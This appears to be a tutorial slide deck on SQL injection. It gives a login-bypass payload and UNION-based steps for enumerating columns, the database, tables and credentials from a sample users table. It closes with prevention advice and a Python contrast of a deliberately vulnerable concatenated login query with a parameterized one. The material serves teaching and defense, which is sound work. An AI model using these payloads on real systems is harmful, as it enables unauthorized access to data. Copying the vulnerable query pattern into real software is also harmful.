SQL Injection

What is SQL injection?

SQL injection is an injection technique in which attacker-supplied input becomes part of a SQL query, letting the attacker inject malicious SQL of their own.
How does It work?

password=admin " or "1" = "1" --+

Since 1=1 is always true, the above


query will be evaluated as true,
irrespective of passwords.
Database: Testdb
Table: users

ID  user  password
1   Alex  Alex
2   John  John123
3   Roy   Roy123

http://Url UNION SELECT user, password FROM users--+

This will return all the users and passwords from the users table.
Problems

• No idea about the number of columns.
• No idea about the table names and databases.
• No idea about the column names.

How to find the database name?

Before finding the database name, we need to find the number of columns.

ORDER BY 1
ORDER BY 2
ORDER BY 3

ORDER BY n sorts by the n-th column of the result, so it fails once n exceeds the column count. If we get an error at 3, the number of columns is equal to 2.
How to get the database name?

Since we have 2 columns (a UNION must select the same number of columns as the original query):

UNION SELECT database(),database()

This will return the database name: Testdb
How to get the table name?

UNION SELECT table_name,table_name FROM information_schema.tables WHERE table_schema = "Testdb"

This will return the table name: users


How to get the column name?

UNION SELECT column_name,column_name FROM information_schema.columns WHERE table_schema = "Testdb" AND table_name = "users"

This will return the column names: user, password
Now we can use the following query:

http://url UNION SELECT user, password FROM users--+

This will return:

ID  user  password
1   Alex  Alex
2   John  John123
3   Roy   Roy123
How to prevent?

• Use of Prepared Statements (with Parameterized Queries).
• Use of Properly Constructed Stored Procedures.
• Allow-list Input Validation.
• Escaping All User Supplied Input.
• Enforcing Least Privilege.
• Performing Allow-list Input Validation as a Secondary Defense.
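As an added example (not code from the original deck), the login check the slides attack, built by string concatenation, beside the prepared-statement version from the list above, both run against a constructed in-memory copy of the Testdb.users table in SQLite. The payload is the deck's password injection written with single quotes, because SQLite treats double-quoted tokens as identifiers rather than string literals.

```python
import sqlite3

# Constructed sample data mirroring the deck's Testdb.users table.
USERS = [(1, "Alex", "Alex"), (2, "John", "John123"), (3, "Roy", "Roy123")]

# The deck's password payload, adapted to SQLite's single-quoted strings.
INJECTED_PASSWORD = "admin' OR '1'='1' --"


def make_db():
    """Build an in-memory copy of the users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, user TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def login_vulnerable(conn, user, password):
    """The pattern the deck attacks: input pasted straight into the SQL text.

    With INJECTED_PASSWORD the statement becomes
      ... WHERE user = 'x' AND password = 'admin' OR '1'='1' --'
    so the OR makes the WHERE clause true for every row and the dangling
    quote is swallowed by the -- comment.
    """
    sql = f"SELECT user FROM users WHERE user = '{user}' AND password = '{password}'"
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, user, password):
    """Prepared statement: the SQL text is fixed, inputs are bound as data."""
    sql = "SELECT user FROM users WHERE user = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (user, password))]


def demo():
    """Run both implementations against valid credentials and the payload."""
    conn = make_db()
    return {
        "vulnerable_valid": login_vulnerable(conn, "Alex", "Alex"),
        "vulnerable_injected": login_vulnerable(conn, "x", INJECTED_PASSWORD),
        "safe_valid": login_safe(conn, "Alex", "Alex"),
        "safe_injected": login_safe(conn, "x", INJECTED_PASSWORD),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

The concatenated version returns every user for the injected password, while the parameterized version returns nothing, because the bound value is compared as a literal string and never parsed as SQL.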
Do you find it helpful?

LinkedIn: https://www.linkedin.com/in/akshay-9675912
GitHub: https://github.com/WIZARD00007/
